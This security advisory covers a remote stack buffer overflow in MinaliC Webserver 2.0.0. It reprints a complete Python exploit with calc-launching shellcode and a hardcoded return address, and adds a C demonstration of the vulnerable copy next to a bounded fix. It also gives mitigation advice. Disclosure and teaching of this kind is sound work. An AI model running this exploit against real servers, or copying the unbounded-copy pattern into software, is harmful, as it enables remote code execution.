Release date:
Updated on: 2013-04-17
Affected Systems:
Sourceforge MinaliC 2.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59056
MinaliC Webserver is a small multi-threaded web server for Windows, written in C.
MinaliC 2.0.0 contains a remotely triggerable stack buffer overflow in its handling of GET requests: an over-long request target overwrites the saved return address (in the published proof of concept EIP is controlled at offset 245 into the target). An attacker who can send a request to the server can exploit this to execute arbitrary code in the context of the server process.
<* Source: superkojiman
Link: http://www.exploit-db.com/exploits/24958/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedure (method) may be offensive in nature and is intended only for security research and teaching. Use it at your own risk.
#!/usr/bin/env python
# Exploit Title: MinaliC Webserver buffer overflow
# Date: 12 Apr 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://minalic.sourceforge.net/
# Version: MinaliC Webserver 2.0.0
# Tested on: Windows XP Pro SP2, English
#
# Description:
# Remote command execution by triggering a buffer overflow in the GET
# request.
#

import socket
import struct

# 74 bytes calc.exe from http://code.google.com/p/win-exec-calc-shellcode/
shellcode = (
    "\x31\xd2\x52\x68\x63\x61\x6c\x63\x89\xe6\x52\x56\x64\x8b\x72" +
    "\x30\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\x8b\x5f" +
    "\x3c\x8b\x5c\x1f\x78\x8b\x74\x1f\x20\x01\xfe\x8b\x4c\x1f\x24" +
    "\x01\xf9\x0f\xb7\x2c\x51\x42\xad\x81\x3c\x07\x57\x69\x6e\x45" +
    "\x75\xf1\x8b\x74\x1f\x1c\x01\xfe\x03\x3c\xae\xff\xd7\xcc"
)

# EIP at offset 245 when minalic.exe is in C:\minalic\bin
# EBX points directly to the "Host:" value, so we put our shellcode there.
# jmp ebx @ 0x7C955B47, NTDLL.DLL, Windows XP Pro SP2 English
junk = "\x41" * 245                      # filler up to the saved return address
ret = struct.pack("<I", 0x7C955B47)      # little-endian address of jmp ebx
host = "\x90" * 30 + shellcode + "\x90" * 31   # NOP sled, payload, NOP padding
buf = "GET /" + junk + ret + " HTTP/1.1\r\n" + "Host: " + host + "\r\n"

print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.37.132", 8080))     # target host and port from the author's lab
s.send(buf)
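Added illustration, not MinaliC's source and not part of superkojiman's exploit: a C sketch of the bug class the advisory describes (a request target copied into a fixed stack buffer without a bound check) beside the bounded parse that closes it, plus a helper that builds a request line with the same shape as the proof of concept so the two parsers can be compared on it. The request-line parser, the 128-byte TARGET_MAX and build_poc_request_line() are assumptions made for this demonstration; only the 245-byte filler and the 0x7C955B47 jmp ebx address are taken from the PoC above.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Illustrative stack buffer size, an assumption for this demo rather than
 * MinaliC's real layout (the PoC's EIP offset of 245 only says the real
 * buffer plus saved frame data spans 245 bytes). */
#define TARGET_MAX 128

/* Locates the request target between "GET " and " HTTP/". Returns its
 * length and sets *start, or -1 if the line is not a GET request line. */
static int find_target(const char *line, const char **start)
{
    const char *end;
    if (strncmp(line, "GET ", 4) != 0 || (end = strstr(line + 4, " HTTP/")) == NULL)
        return -1;
    *start = line + 4;
    return (int)(end - *start);
}

/* Vulnerable pattern: the target is copied into a fixed stack buffer with no
 * bound check. A target longer than TARGET_MAX runs over the saved frame
 * pointer and return address, which is how the PoC lands its "jmp ebx"
 * address in EIP. Returns the target length or -1. */
int parse_target_vulnerable(const char *line)
{
    char target[TARGET_MAX];
    const char *start;
    int n = find_target(line, &start);
    if (n < 0)
        return -1;
    memcpy(target, start, (size_t)n);     /* n is never compared to TARGET_MAX */
    target[n] = '\0';
    return (int)strlen(target);
}

/* Hardened form: the copy is bounded by the destination size the caller
 * passes in, and an over-long target is rejected (a real server would answer
 * 414) rather than truncated. Returns the target length or -1. */
int parse_target_safe(const char *line, char *out, size_t out_len)
{
    const char *start;
    int n = find_target(line, &start);
    if (n <= 0 || (size_t)n >= out_len)    /* leave room for the terminator */
        return -1;
    memcpy(out, start, (size_t)n);
    out[n] = '\0';
    return n;
}

/* Builds a request line shaped like the PoC's: "GET /", 245 filler bytes,
 * the 4-byte return address in little-endian order (struct.pack("<I", ret)
 * in the PoC), then " HTTP/1.1". Returns the length, or 0 if buf is too small. */
size_t build_poc_request_line(char *buf, size_t cap, uint32_t ret)
{
    const char *prefix = "GET /", *suffix = " HTTP/1.1";
    size_t pos = 0, i;

    if (cap < strlen(prefix) + 245 + 4 + strlen(suffix) + 1)
        return 0;
    memcpy(buf, prefix, strlen(prefix));
    pos += strlen(prefix);
    memset(buf + pos, 'A', 245);
    pos += 245;
    for (i = 0; i < 4; i++)              /* lowest byte first */
        buf[pos++] = (char)((ret >> (8 * i)) & 0xff);
    memcpy(buf + pos, suffix, strlen(suffix));
    pos += strlen(suffix);
    buf[pos] = '\0';
    return pos;
}

char poc_line[512];                      /* filled by build_poc() */
char scratch[TARGET_MAX];                /* destination for the safe parser */

size_t build_poc(void)                   /* PoC line with the page's jmp ebx address */
{
    return build_poc_request_line(poc_line, sizeof poc_line, 0x7C955B47u);
}

int main(void)
{
    size_t len = build_poc();
    printf("PoC request line: %zu bytes, return address bytes at 250..253: "
           "%02x %02x %02x %02x\n", len, (unsigned char)poc_line[250],
           (unsigned char)poc_line[251], (unsigned char)poc_line[252],
           (unsigned char)poc_line[253]);
    printf("safe parser: PoC line -> %d, /index.html -> %d\n",
           parse_target_safe(poc_line, scratch, sizeof scratch),
           parse_target_safe("GET /index.html HTTP/1.1", scratch, sizeof scratch));
    /* parse_target_vulnerable(poc_line) is the crash (250-byte target into a
     * 128-byte buffer); only a benign line is passed here. */
    printf("vulnerable parser: /index.html -> %d\n",
           parse_target_vulnerable("GET /index.html HTTP/1.1"));
    return 0;
}
```

Compile with any C99 compiler and run. The vulnerable parser is deliberately never fed the PoC line, since that is the crash being demonstrated; note that a binary built with stack cookies would abort on the corrupted frame instead of jumping to the supplied address, which is why the PoC's fixed ntdll address only works on the unprotected XP SP2 build it was tested against.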
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Sourceforge
-----------
At the time of writing the vendor has not released a patch or an upgraded version. Users of the software should watch the vendor's homepage for a fixed release:
http://minalic.sourceforge.net/
Until a fixed version is available, do not expose MinaliC to untrusted networks: restrict access to its listening port (8080 in the proof of concept) at the host or network firewall, or place a reverse proxy in front of it that enforces a request-line length limit and rejects non-printable bytes in the request target and Host header.